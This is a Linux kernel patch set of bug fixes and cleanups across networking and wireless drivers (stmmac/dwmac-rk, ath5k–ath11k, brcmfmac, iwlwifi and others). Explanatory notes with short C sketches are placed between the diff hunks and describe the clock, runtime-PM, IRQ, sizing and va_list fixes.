++		ret = PTR_ERR_OR_ZERO(bsp_priv->clk_phy);
++		if (ret)
++			return dev_err_probe(dev, ret, "Cannot get PHY clock\n");
+ 		clk_set_rate(bsp_priv->clk_phy, 50000000);
+ 	}
+ 
+@@ -1545,77 +1543,36 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ 
+ static int gmac_clk_enable(struct rk_priv_data *bsp_priv, bool enable)
+ {
+-	int phy_iface = bsp_priv->phy_iface;
++	int ret;
+ 
+ 	if (enable) {
+ 		if (!bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				if (!IS_ERR(bsp_priv->mac_clk_rx))
+-					clk_prepare_enable(
+-						bsp_priv->mac_clk_rx);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_ref))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_ref);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_refout))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_refout);
+-			}
+-
+-			if (!IS_ERR(bsp_priv->clk_phy))
+-				clk_prepare_enable(bsp_priv->clk_phy);
++			ret = clk_bulk_prepare_enable(bsp_priv->num_clks,
++						      bsp_priv->clks);
++			if (ret)
++				return ret;
+ 
+-			if (!IS_ERR(bsp_priv->aclk_mac))
+-				clk_prepare_enable(bsp_priv->aclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->pclk_mac))
+-				clk_prepare_enable(bsp_priv->pclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->mac_clk_tx))
+-				clk_prepare_enable(bsp_priv->mac_clk_tx);
+-
+-			if (!IS_ERR(bsp_priv->clk_mac_speed))
+-				clk_prepare_enable(bsp_priv->clk_mac_speed);
++			ret = clk_prepare_enable(bsp_priv->clk_phy);
++			if (ret)
++				return ret;
+ 
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					       bsp_priv->clock_input, true);
+ 
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_prepare_enable(bsp_priv->clk_mac);
+-			 */
+ 			mdelay(5);
+ 			bsp_priv->clk_enabled = true;
+ 		}
+ 	} else {
+ 		if (bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				clk_disable_unprepare(bsp_priv->mac_clk_rx);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_ref);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_refout);
+-			}
+-
++			clk_bulk_disable_unprepare(bsp_priv->num_clks,
++						   bsp_priv->clks);
+ 			clk_disable_unprepare(bsp_priv->clk_phy);
+ 
+-			clk_disable_unprepare(bsp_priv->aclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->pclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->mac_clk_tx);
+-
+-			clk_disable_unprepare(bsp_priv->clk_mac_speed);
+-
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					      bsp_priv->clock_input, false);
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_disable_unprepare(bsp_priv->clk_mac);
+-			 */
++
+ 			bsp_priv->clk_enabled = false;
+ 		}
+ 	}
+@@ -1629,9 +1586,6 @@ static int phy_power_on(struct rk_priv_data *bsp_priv, bool enable)
+ 	int ret;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 
+-	if (!ldo)
+-		return 0;
+-
+ 	if (enable) {
+ 		ret = regulator_enable(ldo);
+ 		if (ret)
+@@ -1679,14 +1633,11 @@ static struct rk_priv_data *rk_gmac_setup(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	bsp_priv->regulator = devm_regulator_get_optional(dev, "phy");
++	bsp_priv->regulator = devm_regulator_get(dev, "phy");
+ 	if (IS_ERR(bsp_priv->regulator)) {
+-		if (PTR_ERR(bsp_priv->regulator) == -EPROBE_DEFER) {
+-			dev_err(dev, "phy regulator is not available yet, deferred probing\n");
+-			return ERR_PTR(-EPROBE_DEFER);
+-		}
+-		dev_err(dev, "no regulator found\n");
+-		bsp_priv->regulator = NULL;
++		ret = PTR_ERR(bsp_priv->regulator);
++		dev_err_probe(dev, ret, "failed to get phy regulator\n");
++		return ERR_PTR(ret);
+ 	}
+ 
+ 	ret = of_property_read_string(dev->of_node, "clock_in_out", &strings);
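
Note: the dwmac-rk rework is a textbook conversion to the clk_bulk API: seven per-clock devm_clk_get() calls, each with IS_ERR() special-casing at every enable/disable site, collapse into one array of clk_bulk_data plus single bulk get/enable/disable calls (only "stmmaceth" stays separate, since the stmmac core enables it). A condensed sketch of the same shape; struct priv is a stand-in for rk_priv_data:

    #include <linux/clk.h>
    #include <linux/device.h>

    struct priv {
            struct clk_bulk_data *clks;
            int num_clks;
    };

    static const char * const names[] = {
            "aclk_mac", "pclk_mac", "mac_clk_tx", "clk_mac_speed",
    };

    static int clocks_init(struct device *dev, struct priv *p)
    {
            int i, ret;

            p->num_clks = ARRAY_SIZE(names);
            p->clks = devm_kcalloc(dev, p->num_clks, sizeof(*p->clks),
                                   GFP_KERNEL);
            if (!p->clks)
                    return -ENOMEM;

            for (i = 0; i < p->num_clks; i++)
                    p->clks[i].id = names[i];

            /* _optional: a missing clock yields a NULL clk, which every
             * clk_* call treats as a no-op -- no IS_ERR() checks needed.
             */
            ret = devm_clk_bulk_get_optional(dev, p->num_clks, p->clks);
            if (ret)
                    return dev_err_probe(dev, ret, "Failed to get clocks\n");

            return clk_bulk_prepare_enable(p->num_clks, p->clks);
    }
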
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 014ce97f96b15..d0e64c1ab9a55 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6348,6 +6348,10 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	bool is_double = false;
+ 	int ret;
+ 
++	ret = pm_runtime_resume_and_get(priv->device);
++	if (ret < 0)
++		return ret;
++
+ 	if (be16_to_cpu(proto) == ETH_P_8021AD)
+ 		is_double = true;
+ 
+@@ -6355,16 +6359,18 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	ret = stmmac_vlan_update(priv, is_double);
+ 	if (ret) {
+ 		clear_bit(vid, priv->active_vlans);
+-		return ret;
++		goto err_pm_put;
+ 	}
+ 
+ 	if (priv->hw->num_vlan) {
+ 		ret = stmmac_add_hw_vlan_rx_fltr(priv, ndev, priv->hw, proto, vid);
+ 		if (ret)
+-			return ret;
++			goto err_pm_put;
+ 	}
++err_pm_put:
++	pm_runtime_put(priv->device);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int stmmac_vlan_rx_kill_vid(struct net_device *ndev, __be16 proto, u16 vid)
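
Note: the stmmac VLAN fix is the standard runtime-PM bracket for an ndo callback that touches registers: take a resume reference before the first hardware access, bail out if that fails (no reference is held on failure), and drop the reference on every exit path, which the hunk does by funnelling all returns through one label. The generic shape, with illustrative hardware helpers:

    #include <linux/pm_runtime.h>

    static int example_ndo_op(struct device *dev)
    {
            int ret;

            ret = pm_runtime_resume_and_get(dev);
            if (ret < 0)
                    return ret;     /* no reference taken on failure */

            ret = touch_hw_registers(dev);          /* illustrative */
            if (ret)
                    goto out;

            ret = touch_more_registers(dev);        /* illustrative */
    out:
            pm_runtime_put(dev);
            return ret;
    }
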
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index b0c7ab74a82ed..7cf8210ebbec3 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2834,7 +2834,7 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 	int i, qfe_slot = -1;
+ 	char prom_name[64];
+ 	u8 addr[ETH_ALEN];
+-	int err;
++	int err = -ENODEV;
+ 
+ 	/* Now make sure pci_dev cookie is there. */
+ #ifdef CONFIG_SPARC
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index f6a038a1d51e4..c70b27c4c1d5e 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -323,7 +323,7 @@ static int xpcs_read_fault_c73(struct dw_xpcs *xpcs,
+ 	return 0;
+ }
+ 
+-static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
++static int xpcs_read_link_c73(struct dw_xpcs *xpcs)
+ {
+ 	bool link = true;
+ 	int ret;
+@@ -335,15 +335,6 @@ static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
+ 	if (!(ret & MDIO_STAT1_LSTATUS))
+ 		link = false;
+ 
+-	if (an) {
+-		ret = xpcs_read(xpcs, MDIO_MMD_AN, MDIO_STAT1);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (!(ret & MDIO_STAT1_LSTATUS))
+-			link = false;
+-	}
+-
+ 	return link;
+ }
+ 
+@@ -937,7 +928,7 @@ static int xpcs_get_state_c73(struct dw_xpcs *xpcs,
+ 	int ret;
+ 
+ 	/* Link needs to be read first ... */
+-	state->link = xpcs_read_link_c73(xpcs, state->an_enabled) > 0 ? 1 : 0;
++	state->link = xpcs_read_link_c73(xpcs) > 0 ? 1 : 0;
+ 
+ 	/* ... and then we check the faults. */
+ 	ret = xpcs_read_fault_c73(xpcs, state);
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index b224800d7db0b..10e66c89ca0fe 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -395,6 +395,10 @@ static const struct sfp_quirk sfp_quirks[] = {
+ 
+ 	SFP_QUIRK_F("HALNy", "HL-GSFP", sfp_fixup_halny_gsfp),
+ 
++	// HG MXPD-483II-F 2.5G supports 2500Base-X, but incorrectly reports
++	// 2600MBd in their EEPROM
++	SFP_QUIRK_M("HG GENUINE", "MXPD-483II", sfp_quirk_2500basex),
++
+ 	// Huawei MA5671A can operate at 2500base-X, but report 1.2GBd NRZ in
+ 	// their EEPROM
+ 	SFP_QUIRK("HUAWEI", "MA5671A", sfp_quirk_2500basex,
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index d34a4d6325b2b..76f275ca53e9c 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -859,11 +859,11 @@ static int ath11k_ahb_setup_msi_resources(struct ath11k_base *ab)
+ 	ab->pci.msi.ep_base_data = int_prop + 32;
+ 
+ 	for (i = 0; i < ab->pci.msi.config->total_vectors; i++) {
+-		res = platform_get_resource(pdev, IORESOURCE_IRQ, i);
+-		if (!res)
+-			return -ENODEV;
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
+ 
+-		ab->pci.msi.irqs[i] = res->start;
++		ab->pci.msi.irqs[i] = ret;
+ 	}
+ 
+ 	set_bit(ATH11K_FLAG_MULTI_MSI_VECTORS, &ab->dev_flags);
+@@ -1063,6 +1063,12 @@ static int ath11k_ahb_fw_resource_deinit(struct ath11k_base *ab)
+ 	struct iommu_domain *iommu;
+ 	size_t unmapped_size;
+ 
++	/* Chipsets not requiring MSA will not have initialized
++	 * MSA resources; return success in such cases.
++	 */
++	if (!ab->hw_params.fixed_fw_mem)
++		return 0;
++
+ 	if (ab_ahb->fw.use_tz)
+ 		return 0;
+ 
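
Note: this ath11k hunk (and the ath5k one further down) replaces platform_get_resource(pdev, IORESOURCE_IRQ, i) with platform_get_irq(). The raw resource lookup cannot trigger IRQ domain mapping for device-tree interrupts and is deprecated for IRQs; the dedicated accessor maps on demand and propagates errors, including -EPROBE_DEFER:

    #include <linux/platform_device.h>

    static int example_get_irqs(struct platform_device *pdev, int *irqs, int n)
    {
            int i, irq;

            for (i = 0; i < n; i++) {
                    irq = platform_get_irq(pdev, i); /* maps the IRQ if needed */
                    if (irq < 0)
                            return irq;     /* includes -EPROBE_DEFER */
                    irqs[i] = irq;
            }
            return 0;
    }
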
+diff --git a/drivers/net/wireless/ath/ath11k/dbring.c b/drivers/net/wireless/ath/ath11k/dbring.c
+index 2107ec05d14fd..5536e86423312 100644
+--- a/drivers/net/wireless/ath/ath11k/dbring.c
++++ b/drivers/net/wireless/ath/ath11k/dbring.c
+@@ -26,13 +26,13 @@ int ath11k_dbring_validate_buffer(struct ath11k *ar, void *buffer, u32 size)
+ static void ath11k_dbring_fill_magic_value(struct ath11k *ar,
+ 					   void *buffer, u32 size)
+ {
+-	u32 *temp;
+-	int idx;
+-
+-	size = size >> 2;
++	/* memset32() fills the buffer payload with ATH11K_DB_MAGIC_VALUE;
++	 * the size argument is the number of u32 values to store, not the
++	 * number of bytes.
++	 */
++	size = size / sizeof(u32);
+ 
+-	for (idx = 0, temp = buffer; idx < size; idx++, temp++)
+-		*temp++ = ATH11K_DB_MAGIC_VALUE;
++	memset32(buffer, ATH11K_DB_MAGIC_VALUE, size);
+ }
+ 
+ static int ath11k_dbring_bufs_replenish(struct ath11k *ar,
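
Note: the dbring change swaps an open-coded fill loop for memset32(). The removed loop also stepped the pointer twice per iteration (temp++ in the for clause plus *temp++ in the body), so it stamped only every other word while running past the intended range; the replacement fixes that as well. The one subtlety is that memset32() counts 32-bit words, not bytes:

    #include <linux/string.h>

    static void fill_magic(void *buf, u32 size_bytes)
    {
            /* memset32() takes a count of u32 words; divide the byte
             * size down before calling it.
             */
            memset32(buf, ATH11K_DB_MAGIC_VALUE, size_bytes / sizeof(u32));
    }
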
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index 86995e8dc9135..a62ee05c54097 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -16,7 +16,7 @@
+ #include "pci.h"
+ #include "pcic.h"
+ 
+-#define MHI_TIMEOUT_DEFAULT_MS	90000
++#define MHI_TIMEOUT_DEFAULT_MS	20000
+ #define RDDM_DUMP_SIZE	0x420000
+ 
+ static struct mhi_channel_config ath11k_mhi_channels_qca6390[] = {
+diff --git a/drivers/net/wireless/ath/ath11k/peer.c b/drivers/net/wireless/ath/ath11k/peer.c
+index 1ae7af02c364e..1380811827a84 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.c
++++ b/drivers/net/wireless/ath/ath11k/peer.c
+@@ -382,22 +382,23 @@ int ath11k_peer_create(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		return -ENOBUFS;
+ 	}
+ 
++	mutex_lock(&ar->ab->tbl_mtx_lock);
+ 	spin_lock_bh(&ar->ab->base_lock);
+ 	peer = ath11k_peer_find_by_addr(ar->ab, param->peer_addr);
+ 	if (peer) {
+ 		if (peer->vdev_id == param->vdev_id) {
+ 			spin_unlock_bh(&ar->ab->base_lock);
++			mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* Assume sta is transitioning to another band.
+ 		 * Remove here the peer from rhash.
+ 		 */
+-		mutex_lock(&ar->ab->tbl_mtx_lock);
+ 		ath11k_peer_rhash_delete(ar->ab, peer);
+-		mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 	}
+ 	spin_unlock_bh(&ar->ab->base_lock);
++	mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 
+ 	ret = ath11k_wmi_send_peer_create_cmd(ar, param);
+ 	if (ret) {
+diff --git a/drivers/net/wireless/ath/ath5k/ahb.c b/drivers/net/wireless/ath/ath5k/ahb.c
+index 2c9cec8b53d9e..28a1e5eff204e 100644
+--- a/drivers/net/wireless/ath/ath5k/ahb.c
++++ b/drivers/net/wireless/ath/ath5k/ahb.c
+@@ -113,15 +113,13 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 		goto err_out;
+ 	}
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+-	if (res == NULL) {
+-		dev_err(&pdev->dev, "no IRQ resource found\n");
+-		ret = -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0) {
++		dev_err(&pdev->dev, "no IRQ resource found: %d\n", irq);
++		ret = irq;
+ 		goto err_iounmap;
+ 	}
+ 
+-	irq = res->start;
+-
+ 	hw = ieee80211_alloc_hw(sizeof(struct ath5k_hw), &ath5k_hw_ops);
+ 	if (hw == NULL) {
+ 		dev_err(&pdev->dev, "no memory for ieee80211_hw\n");
+diff --git a/drivers/net/wireless/ath/ath5k/eeprom.c b/drivers/net/wireless/ath/ath5k/eeprom.c
+index d444b3d70ba2e..58d3e86f6256d 100644
+--- a/drivers/net/wireless/ath/ath5k/eeprom.c
++++ b/drivers/net/wireless/ath/ath5k/eeprom.c
+@@ -529,7 +529,7 @@ ath5k_eeprom_read_freq_list(struct ath5k_hw *ah, int *offset, int max,
+ 		ee->ee_n_piers[mode]++;
+ 
+ 		freq2 = (val >> 8) & 0xff;
+-		if (!freq2)
++		if (!freq2 || i >= max)
+ 			break;
+ 
+ 		pc[i++].freq = ath5k_eeprom_bin2freq(ee,
+diff --git a/drivers/net/wireless/ath/ath6kl/bmi.c b/drivers/net/wireless/ath/ath6kl/bmi.c
+index bde5a10d470c8..af98e871199d3 100644
+--- a/drivers/net/wireless/ath/ath6kl/bmi.c
++++ b/drivers/net/wireless/ath/ath6kl/bmi.c
+@@ -246,7 +246,7 @@ int ath6kl_bmi_execute(struct ath6kl *ar, u32 addr, u32 *param)
+ 		return -EACCES;
+ 	}
+ 
+-	size = sizeof(cid) + sizeof(addr) + sizeof(param);
++	size = sizeof(cid) + sizeof(addr) + sizeof(*param);
+ 	if (size > ar->bmi.max_cmd_size) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
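
Note: the ath6kl fix is the classic sizeof(pointer) bug: param is a u32 *, so sizeof(param) is the pointer width (8 bytes on 64-bit) rather than the 4 bytes actually marshalled, inflating the computed command size. The safe idiom is to size by the dereferenced object; a standalone demonstration:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
            uint32_t cid = 0, addr = 0, *param = &cid;

            /* wrong: counts the pointer itself (8 bytes on LP64) */
            size_t bad  = sizeof(cid) + sizeof(addr) + sizeof(param);
            /* right: counts the pointed-to u32 (4 bytes) */
            size_t good = sizeof(cid) + sizeof(addr) + sizeof(*param);

            printf("bad=%zu good=%zu\n", bad, good); /* bad=16 good=12 on LP64 */
            return 0;
    }
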
+diff --git a/drivers/net/wireless/ath/ath6kl/htc_pipe.c b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+index c68848819a52d..9b88d96bfe96c 100644
+--- a/drivers/net/wireless/ath/ath6kl/htc_pipe.c
++++ b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+@@ -960,8 +960,8 @@ static int ath6kl_htc_pipe_rx_complete(struct ath6kl *ar, struct sk_buff *skb,
+ 	 * Thus the possibility of ar->htc_target being NULL
+ 	 * via ath6kl_recv_complete -> ath6kl_usb_io_comp_work.
+ 	 */
+-	if (WARN_ON_ONCE(!target)) {
+-		ath6kl_err("Target not yet initialized\n");
++	if (!target) {
++		ath6kl_dbg(ATH6KL_DBG_HTC, "Target not yet initialized\n");
+ 		status = -EINVAL;
+ 		goto free_skb;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index f521dfa2f1945..e0130beb304df 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -534,6 +534,24 @@ static struct ath9k_htc_hif hif_usb = {
+ 	.send = hif_usb_send,
+ };
+ 
++/* Need to free remain_skb allocated in ath9k_hif_usb_rx_stream
++ * in case ath9k_hif_usb_rx_stream is not called again to
++ * process the buffer and free it.
++ */
++static void ath9k_hif_usb_free_rx_remain_skb(struct hif_device_usb *hif_dev)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&hif_dev->rx_lock, flags);
++	if (hif_dev->remain_skb) {
++		dev_kfree_skb_any(hif_dev->remain_skb);
++		hif_dev->remain_skb = NULL;
++		hif_dev->rx_remain_len = 0;
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	spin_unlock_irqrestore(&hif_dev->rx_lock, flags);
++}
++
+ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				    struct sk_buff *skb)
+ {
+@@ -868,6 +886,7 @@ err:
+ static void ath9k_hif_usb_dealloc_rx_urbs(struct hif_device_usb *hif_dev)
+ {
+ 	usb_kill_anchored_urbs(&hif_dev->rx_submitted);
++	ath9k_hif_usb_free_rx_remain_skb(hif_dev);
+ }
+ 
+ static int ath9k_hif_usb_alloc_rx_urbs(struct hif_device_usb *hif_dev)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index b8c99bfce963a..d17bb22422f48 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6494,18 +6494,20 @@ static s32 brcmf_notify_rssi(struct brcmf_if *ifp,
+ {
+ 	struct brcmf_cfg80211_vif *vif = ifp->vif;
+ 	struct brcmf_rssi_be *info = data;
+-	s32 rssi, snr, noise;
++	s32 rssi, snr = 0, noise = 0;
+ 	s32 low, high, last;
+ 
+-	if (e->datalen < sizeof(*info)) {
++	if (e->datalen >= sizeof(*info)) {
++		rssi = be32_to_cpu(info->rssi);
++		snr = be32_to_cpu(info->snr);
++		noise = be32_to_cpu(info->noise);
++	} else if (e->datalen >= sizeof(rssi)) {
++		rssi = be32_to_cpu(*(__be32 *)data);
++	} else {
+ 		brcmf_err("insufficient RSSI event data\n");
+ 		return 0;
+ 	}
+ 
+-	rssi = be32_to_cpu(info->rssi);
+-	snr = be32_to_cpu(info->snr);
+-	noise = be32_to_cpu(info->noise);
+-
+ 	low = vif->cqm_rssi_low;
+ 	high = vif->cqm_rssi_high;
+ 	last = vif->cqm_rssi_last;
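
Note: the brcmfmac change makes the RSSI event parser tolerant of firmware that sends only the leading 4-byte RSSI rather than the full {rssi, snr, noise} triple: test datalen against each layout, largest first, and default the fields that are absent. The shape, as a sketch with placeholder names (kernel types assumed):

    #include <linux/types.h>

    struct rssi_be { __be32 rssi, snr, noise; };

    static int parse_rssi_event(const void *data, u32 datalen,
                                s32 *rssi, s32 *snr, s32 *noise)
    {
            const struct rssi_be *info = data;

            *snr = 0;
            *noise = 0;

            if (datalen >= sizeof(*info)) {             /* full event */
                    *rssi = be32_to_cpu(info->rssi);
                    *snr = be32_to_cpu(info->snr);
                    *noise = be32_to_cpu(info->noise);
            } else if (datalen >= sizeof(__be32)) {     /* legacy: RSSI only */
                    *rssi = be32_to_cpu(*(const __be32 *)data);
            } else {
                    return -EINVAL;                     /* truncated event */
            }
            return 0;
    }
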
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index abf49022edbe4..027360e63b926 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1038,7 +1038,7 @@ iwl_dump_ini_prph_mac_iter(struct iwl_fw_runtime *fwrt,
+ 	range->range_data_size = reg->dev_addr.size;
+ 	for (i = 0; i < le32_to_cpu(reg->dev_addr.size); i += 4) {
+ 		prph_val = iwl_read_prph(fwrt->trans, addr + i);
+-		if (prph_val == 0x5a5a5a5a)
++		if ((prph_val & ~0xf) == 0xa5a5a5a0)
+ 			return -EBUSY;
+ 		*val++ = cpu_to_le32(prph_val);
+ 	}
+@@ -1388,13 +1388,13 @@ static void iwl_ini_get_rxf_data(struct iwl_fw_runtime *fwrt,
+ 	if (!data)
+ 		return;
+ 
++	memset(data, 0, sizeof(*data));
++
+ 	/* make sure only one bit is set in only one fid */
+ 	if (WARN_ONCE(hweight_long(fid1) + hweight_long(fid2) != 1,
+ 		      "fid1=%x, fid2=%x\n", fid1, fid2))
+ 		return;
+ 
+-	memset(data, 0, sizeof(*data));
+-
+ 	if (fid1) {
+ 		fifo_idx = ffs(fid1) - 1;
+ 		if (WARN_ONCE(fifo_idx >= MAX_NUM_LMAC, "fifo_idx=%d\n",
+@@ -1562,7 +1562,7 @@ iwl_dump_ini_dbgi_sram_iter(struct iwl_fw_runtime *fwrt,
+ 		prph_data = iwl_read_prph_no_grab(fwrt->trans, (i % 2) ?
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_MSB :
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_LSB);
+-		if (prph_data == 0x5a5a5a5a) {
++		if ((prph_data & ~0xf) == 0xa5a5a5a0) {
+ 			iwl_trans_release_nic_access(fwrt->trans);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 43e997283db0f..607e07ed2477c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -317,8 +317,10 @@ static void *iwl_dbgfs_fw_info_seq_next(struct seq_file *seq,
+ 	const struct iwl_fw *fw = priv->fwrt->fw;
+ 
+ 	*pos = ++state->pos;
+-	if (*pos >= fw->ucode_capa.n_cmd_versions)
++	if (*pos >= fw->ucode_capa.n_cmd_versions) {
++		kfree(state);
+ 		return NULL;
++	}
+ 
+ 	return state;
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 48e7376a5fea7..7ed4991f8dab9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -138,6 +138,12 @@ static int iwl_dbg_tlv_alloc_buf_alloc(struct iwl_trans *trans,
+ 	    alloc_id != IWL_FW_INI_ALLOCATION_ID_DBGC1)
+ 		goto err;
+ 
++	if (buf_location == IWL_FW_INI_LOCATION_DRAM_PATH &&
++	    alloc->req_size == 0) {
++		IWL_ERR(trans, "WRT: Invalid DRAM buffer allocation requested size (0)\n");
++		return -EINVAL;
++	}
++
+ 	trans->dbg.fw_mon_cfg[alloc_id] = *alloc;
+ 
+ 	return 0;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+index ae4c2a3d63d5b..3a3c13a41fc61 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2005-2011, 2021 Intel Corporation
++ * Copyright (C) 2005-2011, 2021-2022 Intel Corporation
+  */
+ #include <linux/device.h>
+ #include <linux/interrupt.h>
+@@ -57,6 +57,7 @@ void __iwl_err(struct device *dev, enum iwl_err_mode mode, const char *fmt, ...)
+ 	default:
+ 		break;
+ 	}
++	vaf.va = &args;
+ 	trace_iwlwifi_err(&vaf);
+ 	va_end(args);
+ }
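
Note: the one-line iwl-debug fix repairs va_list handling: the dev_err() branch consumes a va_copy (args2) and va_end()s it, but vaf.va was left pointing at that dead copy when trace_iwlwifi_err() ran. Re-pointing vaf.va at the still-live args before the tracepoint restores defined behaviour. The underlying rule, in a runnable sketch:

    #include <stdarg.h>
    #include <stdio.h>

    static void log_twice(const char *fmt, ...)
    {
            va_list args, args2;

            va_start(args, fmt);

            va_copy(args2, args);   /* first consumer gets a private copy */
            vfprintf(stderr, fmt, args2);
            va_end(args2);          /* args2 is dead from here on */

            vprintf(fmt, args);     /* second consumer must use the live list */
            va_end(args);
    }

    int main(void)
    {
            log_twice("value=%d\n", 42);
            return 0;
    }
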
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index c5ad34b063df6..29f75948ab00c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -563,6 +563,7 @@ static void iwl_mvm_wowlan_get_tkip_data(struct ieee80211_hw *hw,
+ 		}
+ 
+ 		for (i = 0; i < IWL_NUM_RSC; i++) {
++			ieee80211_get_key_rx_seq(key, i, &seq);
+ 			/* wrapping isn't allowed, AP must rekey */
+ 			if (seq.tkip.iv32 > cur_rx_iv32)
+ 				cur_rx_iv32 = seq.tkip.iv32;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+index 1ce9450e5add2..4071827d44757 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+@@ -1745,6 +1745,11 @@ static ssize_t iwl_dbgfs_mem_read(struct file *file, char __user *user_buf,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
